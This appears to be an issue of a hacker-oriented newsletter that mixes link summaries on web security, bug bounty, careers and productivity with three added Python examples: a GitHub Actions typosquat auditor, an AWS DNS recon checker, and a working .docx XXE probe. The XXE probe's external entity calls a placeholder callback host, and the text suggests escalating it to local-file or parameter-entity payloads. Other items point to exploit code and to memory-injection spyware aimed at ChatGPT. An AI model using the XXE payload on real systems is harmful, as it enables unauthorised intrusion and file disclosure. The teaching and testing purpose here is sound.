Hive Five 190 - Whatever You Think Your Limits Are, You're Wrong
Beyond XSS, Console Cowboys, How to be More Productive on your iPhone, and more...
Hi friends,
Greetings from the hive.
I want to hear from you! I want to know how Hive Five has empowered you to hack a life you love.
So, if you've ever benefited from the newsletter, let me know.
Let's take this week by swarm!
The Bee's Knees
Beyond XSS: Explore the Web Front-end Security Universe. Apart from the well-known XSS, web front-end security encompasses lesser-known vulnerabilities like prototype pollution, CSS injection, and side-channel attacks, all worth learning about. MORE
Using YouTube to Steal Your Files is an impressive cross-product chain targeting Google, and a great example of why it pays to keep track of seemingly useless quirks and behaviors. Perhaps one day they'll be just the missing piece you need. MORE
Refine your recon methods or learn totally new ones as OrwaGodfather shares his approach. He starts off with GitHub and Bing advanced search queries. MORE
Learn how to set up an iPhone to be minimalist and productive. I'm a big believer in customizing your (digital) workspaces to your liking. The phone is a big part of that. MORE
Console Cowboys: Navigating the Modern Terminal Frontier. Check out these CLI tools that'll change the way you approach work, making everything faster, smoother, and more efficient. MORE
Upgrade Yourself
You're getting the free version. Members get more, including exclusive & bonus content, access to an online community of smart and driven people, the complete Hive Archive, deep discounts, and so much more. See what you're missing.
Do you have a product or service to promote? Find out more about advertising in Hive Five.
Updates
My work
Changelog
Lazygit v0.44.1 comes with numerous changes, including improved performance with large numbers of untracked or modified files. MORE
RetireJS 1.6.4 offers improvements and bug fixes, such as "Add dependencies to CycloneDX". MORE
Caido release v0.41.0 introduces a new community plugin store, allowing users to install plugins with a single click, and expands the SDK APIs while fixing important bugs. MORE
Work
Career
Adam Gilbert founded MyBodyTutor, a 7-figure fitness business, by providing personalized, consistent support that is often missing from diet and workout plans. MORE
The Four Steps to the Epiphany: Successful Strategies for Products that Win. MORE
The tech industry offers lucrative opportunities, but many professionals are unaware of how to maximize their earnings. Learn how to avoid being underpaid in your tech job. MORE
Redditors discuss productivity hacks for corporate jobs, with tips on optimizing workflow, managing time, and avoiding distractions. MORE
Productivity
The Power of Wasting Time. In today's productivity-obsessed world, even a moment's idleness is seen as a grave sin. We are so driven to stay busy and make constant progress that there is no room left for the simple act of wasting time. MORE
Feeling overwhelmed by the present moment? Find a connection to the longer view and a wiser perspective on what matters. MORE
Amanda's daily two-do list is a game changer for making progress on big projects, allowing people to complete 10 projects in a week, more than most accomplish in a month. MORE
This video shares a 3-step process for transforming your life in your 20s, including setting non-negotiables and maximizing productivity. The aim is to structure your day in a way that makes it impossible to fail. MORE
Community
Celebrate
Valeriy, once doubtful, feels motivated and driven to keep pushing forward after reaching heights he didn't think possible. Let's go! MORE
Jensec, a security researcher, received their highest bounty yet ($42,500). Woot! MORE
Zseano had a great time in Edinburgh this weekend: he got to hang out with his hacking partner Jonathan and got to see NahamSec again after many years. MORE
Endingwithali and Shenetworks launched a podcast! The first episode delves into the current tech job landscape, examining the rise in layoffs across major companies. MORE
Timeline
A controversial repo containing self-hosted bug bounty programs that are considered "scammy" or unethical by the creator. MORE | ITS COUNTERPART
There seems to be some beef in the WordPress community: "It has to be said and repeated: WP Engine is not WordPress. My own mother was confused and thought WP Engine was an official thing." MORE
DAY[0] is back, testing out a new episode format focusing more on discussion rather than summaries. MORE
OpenAI is seemingly banning several security-adjacent GPTs from the GPT Store. MORE
Neovimconf 2024 speaker applications are now open! MORE
Follow
Awesome accounts to follow. Randomly selected from my curated Twitter lists.
@tjholowaychuk | TJ Holowaychuk | Mostly film photography.
@0xacb | André Baptista | Ethical hacker on a cosmic journey. Co-founder @ethiack.
@0xkitty | Christina Camilleri | Trust & Safety lead for @Netflix Games. Prev infosec @RiotGames, @BishopFox. Part cyborg. Enjoys motorcycles, video games, whisky and cats.
@ryHanson | Ryan Hanson | Security Researcher. Breaking things at @Atredis.
@akita_zen | Akita | Bug Bounty hunter | Zen Monk | alchemist | its time to awake.
Share Hive Five
Share this newsletter with your friends, colleagues, and BFFs.
1 REFERRAL = 20% OFF EVERYTHING IN THE STORE
Level up
Read
How to leverage nuclei headless mode to detect XSS payloads more easily and accurately, using the waitdialog action. This approach significantly reduces the complexity of matching specific server responses, while maintaining high accuracy. MORE
Third-party security scanners often produce non-actionable findings. Google shares tips that will help you distinguish false positives from the real thing when using external scanners, and in turn improve the quality of the findings you act on. MORE
The Feeld dating app exposed users' sensitive data and nude photos due to poor security controls, highlighting the critical importance of robust backend security for mobile applications. MORE
GitHub Actions automates software development workflows, allowing developers to customize and execute them directly in their GitHub repositories. This PoC exploit explores how typosquatting can be leveraged within the GitHub Actions ecosystem. MORE
The "real" Ivanti Endpoint Manager (EPM) Pre-Auth RCE CVE-2024-29847 write-up. MORE
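The GitHub Actions typosquatting item above comes down to one line in a workflow: `uses: owner/repo@ref`, where a near-miss owner name or a movable tag is all an attacker needs. The following is an added example, not the linked PoC: a small audit that parses `uses:` references, flags owners within a short edit distance of an allow-list you trust, and reports references pinned to a tag instead of a full commit SHA. The trusted-owner set, the workflow text and the look-alike `action/setup-node` are constructed for the example.

```python
"""Audit GitHub Actions `uses:` references for look-alike owners and unpinned refs.

Added example (not the PoC the newsletter links to). TRUSTED_OWNERS is an
assumed allow-list; SAMPLE_WORKFLOW and the look-alike owner in it are
constructed. The commit SHA on the checkout step is a placeholder, not a
real actions/checkout commit.
"""
import re

TRUSTED_OWNERS = {"actions", "docker", "github"}  # assumption: your own allow-list

# One `uses:` per line; stops at whitespace or a trailing YAML comment.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def edit_distance(a, b):
    """Plain Levenshtein distance, enough to catch one- or two-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_uses(workflow_text):
    """Return (owner, repo, ref) for each remote action; skips local './' and 'docker://' uses."""
    refs = []
    for match in USES_RE.finditer(workflow_text):
        spec = match.group(1)
        if spec.startswith("./") or spec.startswith("docker://"):
            continue
        path, _, ref = spec.partition("@")
        parts = path.split("/")
        if len(parts) < 2:
            continue
        refs.append((parts[0], parts[1], ref))
    return refs


def audit(workflow_text, trusted=TRUSTED_OWNERS, max_distance=2):
    """Return (kind, 'owner/repo@ref', nearest_trusted_owner_or_None) findings."""
    findings = []
    for owner, repo, ref in parse_uses(workflow_text):
        spec = f"{owner}/{repo}@{ref}"
        if owner not in trusted:
            near = [t for t in sorted(trusted)
                    if 0 < edit_distance(owner.lower(), t) <= max_distance]
            if near:
                findings.append(("lookalike-owner", spec, near[0]))
            else:
                findings.append(("untrusted-owner", spec, None))
        # A tag or branch can be moved after review; a full commit SHA cannot.
        if not FULL_SHA_RE.match(ref):
            findings.append(("unpinned", spec, None))
    return findings


SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - uses: action/setup-node@v4            # constructed look-alike of actions/setup-node
      - uses: docker/login-action@v3
      - uses: ./.github/actions/local-step
      - uses: someone/random-action@main
"""

if __name__ == "__main__":
    for kind, spec, near in audit(SAMPLE_WORKFLOW):
        print(kind, spec, f"(near {near})" if near else "")
```

Run it over the `.github/workflows/*.yml` files in a repository. Edit distance catches dropped or swapped characters, not every confusable name, so treat it as a triage signal and pair it with SHA pinning, which removes the "tag moved after review" problem regardless of who owns the action.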
Tips
Use AI to augment yourself. STÖK likes XXEs, but testing XML parsers using docx files can be quite a tedious task. So he asked ChatGPT o1 to help him create a Python script that automates the process. MORE
Setting up a blog on GitHub Pages doesn't have to be a daunting task. With the right tools, templates, and a bit of guidance, you can have your blog up and running with minimal effort. MORE
Review: iFixit's FixHub May Be The Last Soldering Iron You Ever Buy. MORE
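For the docx XXE tip above, the tedious part is that a .docx is a zip of XML parts, so every probe means rebuilding the package. The block below is an added example, not STÖK's script: it assembles the three parts a minimal .docx needs and puts an external-entity declaration in word/document.xml, so that any server-side parser which resolves DTD entities will fetch the URL. The callback URL is a placeholder for your own listener; use this only against parsers you are authorised to test.

```python
"""Build a minimal .docx whose word/document.xml declares an external entity.

Added example, not STÖK's script. CALLBACK_URL is a placeholder: replace it
with a listener you control and watch for the request. A parser that
resolves the entity is vulnerable to XXE; one with DTD/entity resolution
disabled will ignore or reject the DOCTYPE.
"""
import io
import zipfile

CALLBACK_URL = "http://xxe-callback.example/probe"  # placeholder, not a real listener

# Minimum package pieces for an OOXML word-processing document.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""


def document_xml(entity_url, marker="xxe"):
    """Main document part with a DOCTYPE that declares and then references an external entity."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE w:document [
  <!ENTITY {marker} SYSTEM "{entity_url}">
]>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p><w:r><w:t>&{marker};</w:t></w:r></w:p></w:body>
</w:document>"""


def build_docx(entity_url=CALLBACK_URL):
    """Return the .docx package as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", document_xml(entity_url))
    return buf.getvalue()


def part_names(docx_bytes):
    """List the parts inside a package (for checking what was written)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.namelist()


def part(docx_bytes, name):
    """Read one XML part back as text."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(name).decode()


if __name__ == "__main__":
    with open("xxe-probe.docx", "wb") as f:
        f.write(build_docx())
```

Upload the file wherever the target accepts documents and watch the listener; a hit proves entity resolution, after which you can swap the SYSTEM URL for a local path or a parameter-entity payload. On the defending side, the fix is to disable DTD processing or external entity resolution in whatever library parses the uploaded XML.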
Wisdom
Framing: "Read the paper, things have never been worse. Read history, things have never been better." MORE
Learn the basics of Tmux in 100 seconds. Tmux is an open-source terminal multiplexer that can juggle multiple terminal sessions from a single window. MORE
Radical Belonging in an Age of Othering. This essay invites us to consider whether we are sick from loneliness or from not belonging, to each other and to ourselves, and how gratefulness offers a remedy. MORE
Whatever You Think Your Limits Are, You're Wrong. MORE
How to Be Less Self-Critical. If you struggle with being too self-critical, here are 5 ways to start turning things around. MORE
Resources
Cursor Rules offers a framework to customize AI behavior, streamline development, and tailor code generation, suggestions, and queries. MORE
Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware). MORE
GitHub's collection of .gitignore file templates populate the template choosers on GitHub.com when creating new repositories and files. MORE
Combined exploit for two critical vulnerabilities discovered in VICIdial by KoreLogic: CVE-2024-8503: Unauthenticated SQL Injection (SQLi) and CVE-2024-8504: Authenticated Remote Code Execution (RCE). MORE
TJNull has released his pentest template for Obsidian, which includes a better structure, tags, and techniques used in engagements, Hack the Box, and PEN-200. MORE
Quote
"The only person you are destined to become is the person you decide to be."
Explore
Tools
403Bypasser is a simple Caido plugin that helps you get past 403 responses by transforming HTTP requests with custom templates. MORE
Subdominator is a new CLI tool designed to rapidly and accurately detect subdomain takeovers. It aims to be a significant improvement over existing tools, focused on precision and speed. MORE
Grimoire is a "REPL for detection engineering" that allows users to generate datasets of cloud audit logs for common attack techniques, currently supporting AWS. MORE
This script checks DNS A and CNAME records for a list of domains against AWS IP ranges, helping identify potentially risky or unowned resources in your or your client's cloud infrastructure. MORE
Subwiz is a reconnaissance tool that employs AI to forecast subdomains and then returns those that resolve. MORE
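The AWS range-checking script above boils down to two lookups: is each A record inside a published AWS prefix, and does each CNAME point into an AWS namespace that no longer answers. The following is an added example, not the linked script: it takes records in the shape of ip-ranges.json, matches A records by longest prefix, and flags CNAME targets under AWS suffixes that fail to resolve. The prefix subset, the DNS answers and the resolver are constructed so it runs offline; for real use, fetch https://ip-ranges.amazonaws.com/ip-ranges.json and swap in a real resolver.

```python
"""Match DNS A and CNAME answers against AWS IP ranges.

Added example, not the script the newsletter links. AWS_RANGES_SUBSET has the
shape of ip-ranges.json but its entries are constructed; CONSTRUCTED_DNS and
constructed_resolve stand in for live lookups.
"""
import ipaddress

AWS_SUFFIXES = (".amazonaws.com.", ".cloudfront.net.", ".elasticbeanstalk.com.")

AWS_RANGES_SUBSET = {  # constructed entries in the same shape as the real file
    "prefixes": [
        {"ip_prefix": "52.94.76.0/22", "region": "us-west-2", "service": "AMAZON"},
        {"ip_prefix": "52.94.77.0/24", "region": "us-west-2", "service": "EC2"},
        {"ip_prefix": "13.248.96.0/19", "region": "GLOBAL", "service": "GLOBALACCELERATOR"},
    ]
}

CONSTRUCTED_DNS = {  # name -> answers; a missing key means the name does not resolve
    "www.example.com": {"A": ["52.94.77.10"], "CNAME": []},
    "assets.example.com": {"A": [], "CNAME": ["d111111abcdef8.cloudfront.net."]},
    "d111111abcdef8.cloudfront.net": {"A": ["13.248.100.1"], "CNAME": []},
    "old-app.example.com": {"A": [], "CNAME": ["old-app-1234.s3-website-us-east-1.amazonaws.com."]},
    "mail.example.com": {"A": ["203.0.113.5"], "CNAME": []},
}
DOMAINS = ["www.example.com", "assets.example.com", "old-app.example.com", "mail.example.com"]


def constructed_resolve(name):
    """Stand-in resolver: returns the answer dict or None when the name does not exist."""
    return CONSTRUCTED_DNS.get(name.rstrip("."))


def load_networks(ip_ranges):
    """Turn ip-ranges.json-style entries into (network, region, service) tuples."""
    return [(ipaddress.ip_network(p["ip_prefix"]), p["region"], p["service"])
            for p in ip_ranges["prefixes"]]


def match_ip(ip, networks):
    """Most specific AWS range containing ip (AWS lists overlapping prefixes), else None."""
    addr = ipaddress.ip_address(ip)
    hits = [h for h in networks if addr in h[0]]
    if not hits:
        return None
    net, region, service = max(hits, key=lambda h: h[0].prefixlen)
    return {"prefix": str(net), "region": region, "service": service}


def check_domains(domains, resolve, networks):
    """Per domain: A records inside AWS, CNAMEs into AWS, and AWS CNAMEs that no longer resolve."""
    report = {}
    for name in domains:
        answers = resolve(name) or {"A": [], "CNAME": []}
        findings = []
        for ip in answers["A"]:
            hit = match_ip(ip, networks)
            if hit:
                findings.append(("a-in-aws", ip, hit["service"], hit["region"]))
        for target in answers["CNAME"]:
            fqdn = target if target.endswith(".") else target + "."
            if fqdn.endswith(AWS_SUFFIXES):
                kind = "dangling-aws-cname" if resolve(target) is None else "cname-to-aws"
                findings.append((kind, target, None, None))
        report[name] = findings
    return report


if __name__ == "__main__":
    networks = load_networks(AWS_RANGES_SUBSET)
    for domain, findings in check_domains(DOMAINS, constructed_resolve, networks).items():
        print(domain, findings or "no AWS association")
```

A `dangling-aws-cname` is a takeover candidate, not a confirmed one: whether the name can be claimed depends on the service behind it (an unclaimed S3 website bucket name is a different story from a deleted CloudFront distribution), so verify each by hand before reporting. The longest-prefix match matters because the real file lists broad AMAZON ranges that overlap more specific per-service ones, and the service label is usually what tells you who owns the asset.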
Watch
Supercharging Developer Productivity with ChatGPT and Claude with Simon Willison. He shares his favorite prompting and debugging techniques, his strategies for sidestepping the limitations of contemporary models, and more. MORE
Why is Vite Everywhere? Evan discusses Vite, a JavaScript build tool that simplifies the process of transforming and bundling code for web applications. MORE
8 exercises to address the negative effects of working behind a desk all day. MORE
NahamSec demonstrates two methods for hacking GitLab instances for a $5,000 bounty. MORE
The Web Dev Challenge tasks a team to create an app that excites people about their local food scene, with only 45 minutes to plan and 4 hours to build. The goal is to see what they can accomplish under tight constraints. MORE
Listen
Robert Greene transitioned from a struggling screenwriter to a bestselling author by mastering the art of storytelling, inspiring entrepreneurs, politicians, and artists alike. How does he do it? MORE
The untold story of Casey Neistat: "I was a homeless dad at 15 & had $200k debt!" MORE
Robert went from being "a drunk, failed screenwriter" to writing seven bestsellers with millions of copies sold. Entrepreneurs, politicians, and hip-hop artists like 50 Cent all love his work. His secret ingredient? Storytelling. MORE
Technology
Get $200 to try DigitalOcean, the go-to for all my recon, automation, and VPN needs. Get access to a comprehensive range of cloud resources, all at an affordable price.
Sidekick makes hosting side projects as straightforward, affordable, and production-ready as possible. You'll be surprised how much traffic an $8/month instance on DigitalOcean can handle. MORE
Cloudflare's Internet speed test allows you to measure your network performance without annoying ads. MORE
The new Stripe Dev website is a fascinating piece of front-end dev work, containing some cutting-edge design and dev work. MORE
Uptime Kuma is an easy-to-use, self-hosted monitoring tool that lets you keep track of your website's uptime. MORE
The relentless march of AI advancements is a defining characteristic of the technology industry, yet vi, a text editor, endures. Though much changes, some things stay the same. MORE
"The other reason it feels special is that vi turns manipulating text into a key-based form of Street Fighter. Sure, you can have fun just learning the basic buttons for punching and kicking, but the game unlocks an entirely new dimension the moment you pull off your first hadoken [...]"
Interesting
The Lighthouse Map website provides an interactive map showcasing the locations of lighthouses around the world, allowing users to explore these important maritime landmarks. MORE
Windows Solitaire, a beloved office distraction, was not created by a seasoned employee but by a bored Microsoft intern โ a surprising origin for a staple of digital entertainment. MORE
Who made the man in the desert? Digital investigator Ben takes a look at the mysterious Marree Man, a giant geoglyph etched into the remote Australian outback. MORE
Bonzo, a videographer, shares his journey of starting over from zero, a beautiful and meaningful experience. MORE
YouTube Thumbnail Viewer allows one to view the thumbnail of any YouTube video by entering the URL or video ID. MORE
Learned something? Dive deeper.
Until next week, take care of yourself and each other,
Bee
This newsletter may contain affiliate links that support its costs. These links lead to tools, courses, and resources that I've personally found helpful.